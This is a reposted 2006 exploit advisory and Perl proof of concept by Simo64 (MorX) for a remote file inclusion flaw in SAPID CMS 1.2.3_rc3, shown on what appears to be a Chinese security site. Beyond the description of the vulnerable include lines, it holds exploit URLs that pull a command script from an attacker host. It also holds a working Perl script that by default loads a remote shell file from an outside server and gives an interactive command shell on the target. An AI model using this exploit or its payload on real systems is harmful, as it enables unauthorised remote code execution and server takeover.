首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit
来源:http://www.morx.org 作者:Simo64 发布时间:2006-08-10  

#########################################################################
# Title: SAPID CMS Multiple remote Command Execution Vulnerabilities
#
# Author: Simo64 <simo64_at_morx_org>
#
# Discovered: 06 Aout 2006
#
# Published : 08 Aout 2006
#
# MorX Security Research Team
#
# http://www.morx.org
#
# Vendor : SAPID CMS
#
# Version : 123 rc3 ()
#
# Website : http://sapid.sourceforge.net
#
# Severity: Critical
#
# Details:
#
#
# [+] Remote File Inclusion
#
# 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($root_path."usr/system/common_extfunctions.inc.php"); }
#
# 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 )
#
# if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded");
# include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); }
#
# $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files
#
# [-] Exploit :
#
# http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd
#
# http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd
#
#======================================
# Poc Remote Command Execution Exploit:
#======================================
#
# http://www.morx.org/sapid.txt
#
# C:\>perl sapid.pl http://127.0.0.1
#
# ===============================================================
# = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =
# ===============================================================
# = MorX Security Research Team - www.morx.org =
# = Coded by Simo64 - simo64@www.morx.org =
# ===============================================================

# simo64@morx.org :~$ id; ls
# uid=48(apache) gid=48(apache) groups=48(apache)
# get_calendar.inc.php
# get_filter_list.inc.php
# get_gb_records.inc.php
# get_infochannelfilter.inc.php
# get_infochannel.inc.php
# get_rss.inc.php
# get_searchresults.inc.php
# get_survey.inc.php
# get_track.inc.php
# get_tree.inc.php
# soap_call.inc.php
# simo64@morx.org :~$ exit

# Enjoy !
#
#!/usr/bin/perl


use LWP::Simple;

print "\n===============================================================\n";
print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n";
print "===============================================================\n";
print "= MorX Security Research Team - www.morx.org =\n";
print "= Coded by Simo64 - simo64\@www.morx.org =\n";
print "===============================================================\n\n";

my $targ,$rsh,$path,$con,$cmd,$data,$getit ;

$targ = $ARGV[0];
$rsh = $ARGV[1];

if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";}

if(!@ARGV) { &usage;exit(0);}

$targ = $ARGV[0];


chomp($targ);
chomp($rsh);

$path = $targ."/usr/extensions/get_infochannel.inc.php";
$con = get($path) || die "[-]Cannot connect to Host";

sub usage(){
print "Usage : perl $0 host/path [OPTION]\n\n";
print "Exemples : perl $0 http://127.0.0.1\n";
print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n";
}

while ()
{
print "simo64\@morx.org :~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);}
$getit = $path."?root_path=".$rsh."?&cmd=".$cmd;
$data=get($getit);
if($cmd eq ""){ print "Please enter command !\n"; }
else{ print $data ;}
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHPMyRing <= 4.2.0 (view_co
·OpenMPT <= 1.17.02.43 Multi
·PocketPC MMS Composer (WAPPush
·WEBinsta CMS <= 0.3.1 (temp
·PHP <= 4.4.3 / 5.1.4 (objIn
·Nokia Symbian 60 3rd Edition B
·eIQnetworks License Manager Re
·XMB <= 1.9.6 Final basename
·myBloggie <= 2.1.4 (trackba
·Opera 9 IRC Client Remote Deni
·XChat <= 2.6.7 (Windows Ver
·Opera 9 IRC Client Remote Deni
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved